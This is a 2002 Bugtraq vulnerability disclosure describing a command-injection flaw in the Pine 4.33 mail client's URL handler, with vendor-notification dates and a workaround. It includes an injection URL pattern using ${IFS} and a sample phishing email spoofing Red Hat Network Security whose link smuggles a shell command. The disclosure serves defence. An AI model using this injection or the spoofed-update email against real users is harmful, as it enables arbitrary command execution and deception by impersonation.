Bugtraq mailing list archives
Pine 4.33 (at least) URL handler allows embedded commands.
From: zen-parse <zen-parse () gmx net>
Date: Sat, 5 Jan 2002 15:17:16 +1300 (NZDT)
Systems: Pine 4.33 (under Redhat 7.0)
(Probably many others, haven't checked much)
Vendors notified: Sat, 20 Oct 2001 06:50:12 +1300 (NZDT)
And again: Fri, 9 Nov 2001 07:14:15 +1300 (NZDT)
And again: Thu, 3 Jan 2002 08:15:55 +1300 (NZDT)
Problem: URL handler allows embedded commands.
May allow email viruses of the Outlook kind.
Severity: Extremely Low -> Very High (Dependant on current
email reading habits)
Workaround: Don't view URLs from inside Pine.
(ObSpam: Except for http://mp3.com/cosv/ ;])
Details:
This is a similar problem to the xchat 1.4.1 URL handler vulnerability.
http://www.securityfocus.com/bid/1601
In Pine, if a user selects a URL for the form
http://address/'&/some/program${IFS}with${IFS}arguments&'
and URL handlers are installed, they will end up with the browser open
on
http://address/
and
/some/program with arguments
will get executed.
If you are reading your email as root these these commands will execute as
root. (Create an alias for root to a non-privileged user instead of
reading mail as root.)
If you are reading your email as a non-privileged user, the impact is
somewhat lower, although local exploits could be run on the computer, or
Outlook style email viruses could be executed.
If you don't view links given to you in Pine, the impact from this
problem is non-existant.
It is possible to obfuscate the URL by putting it in an HTML message
such as the following.
----Begin html email----
From: Redhat Network Security <rhnsecurity () redhat com>
To: undisclosed list <.@.>
Subject: Urgent update required to PINE
Message-ID: <Pine.LNX.4.33.0110221213510.9618-200000@clarity.local>
MIME-Version: 1.0
Content-Type: TEXT/html
Content-ID: <Pine.LNX.4.33.0110221214120.9618@clarity.local>
Content-Length: 389
Lines: 12
<HTML>
<BODY>
Urgent update:<p>
PINE allows execution of arbitrary commands.<p>
<a
href="http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/hole-in-pine-url-handler/';touch${IFS}/tmp/zen.was.here;'/";>
http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/hole-in-pine-url-handler/</a>
<p>
This link contains PINE update information. <p>
You are advised to perform this immediately. <p>
The link also contains other urgent update information. <p>
</BODY>
</HTML>
----End html email----
Which would appear something like
----Begin view of email----
Date: Mon, 22 Oct 2001 13:34:40 +1300
From: Redhat Network Security <rhnsecurity () redhat com>
To: undisclosed list <.@.>
Subject: Urgent update required to PINE
Urgent update:
PINE allows execution of arbitrary commands.
http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/ho
e-in-pine-url-handler/
This link contains PINE update information.
You are advised to perform this immediately.
The link also contains other urgent update information.
----End view of email----
When this link is selected to follow, Pine changes the status/menu lines
to read:
View selected URL "http://updates.redhat.com/update_information/urgent/r..."; ?
Y [Yes] U editURL
N No A editApp
Which appears to match the url in the email. This probably makes detection
of this kind of exploit attempt harder.
-- zen-parse
[ A (relatively) safe way to visit http://mp3.com/cosv is to type the
address into the address bar of the browser you are using. Contrary to a
rumour posted several days ago, the only way I get any money from this
site is through CD purchases. If you want to, visit the site and listen
to the music. If you like it, you might want to buy it, or not. I hope
nobody has any illusion of being tricked into visiting. ]
--
-------------------------------------------------------------------------
The preceding information is confidential and may not be redistributed
without explicit permission. Legal action may be taken to enforce this.
If this message was posted by zen-parse () gmx net to a public forum it may
be redistributed as long as these conditions remain attached. If you are
mum or dad, this probably doesn't apply to you.
Current thread:
- Pine 4.33 (at least) URL handler allows embedded commands. zen-parse (Jan 05)
- Re: Pine 4.33 (at least) URL handler allows embedded commands. Michal Zalewski (Jan 07)
- Re: Pine 4.33 (at least) URL handler allows embedded commands. zen-parse (Jan 08)
- Re: Pine 4.33 (at least) URL handler allows embedded commands. Roman Drahtmueller (Jan 08)
- Re: Pine 4.33 (at least) URL handler allows embedded commands. Michal Zalewski (Jan 07)